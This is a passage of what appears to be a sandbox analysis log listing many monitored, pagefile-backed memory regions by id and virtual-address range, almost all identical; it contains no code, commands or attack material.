start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8217 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8218 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8219 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8220 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8221 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8222 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8223 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8224 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8225 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8226 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8227 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8228 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8229 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8230 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8231 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8232 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8233 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8234 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8235 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8236 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8237 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8238 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8239 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8240 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8241 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8242 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8243 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8244 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8245 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8246 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8247 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8248 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8249 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8250 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8251 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8252 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8253 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8254 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8255 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8256 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8257 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8258 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8259 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8260 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8261 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8262 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8263 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8264 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8265 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8266 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8267 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8268 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8269 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8270 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8271 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8272 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8273 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8274 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8275 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8276 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8277 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8278 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8279 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8280 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8281 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8282 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8283 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8284 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8285 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8286 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8287 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8288 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8289 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8290 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8291 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8292 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8293 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8294 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8295 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8296 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8297 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8298 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8299 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8300 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8301 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8302 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8303 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8304 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8305 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8306 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8307 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8308 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8309 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8310 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8311 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8312 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8313 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8314 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8315 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8316 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8317 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8318 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8319 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8320 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8321 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8322 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8323 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8324 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8325 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8326 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8327 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8328 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8329 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8330 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8331 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8332 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8333 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8334 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8335 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8336 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8337 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8338 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8339 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8340 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8341 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8342 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8343 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8344 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8345 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8346 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8347 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8348 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8349 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8350 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8351 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8352 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8353 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8354 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8355 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8356 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8357 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8358 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8359 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8360 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8361 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8362 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8363 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8364 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8365 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8366 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8367 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8368 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8369 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8370 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8371 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8372 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8373 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8374 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8375 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8376 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8377 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8378 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8379 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8380 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8381 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8382 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8383 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8384 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8385 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8386 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8387 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8388 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8389 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8390 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8391 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8392 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8393 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8394 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 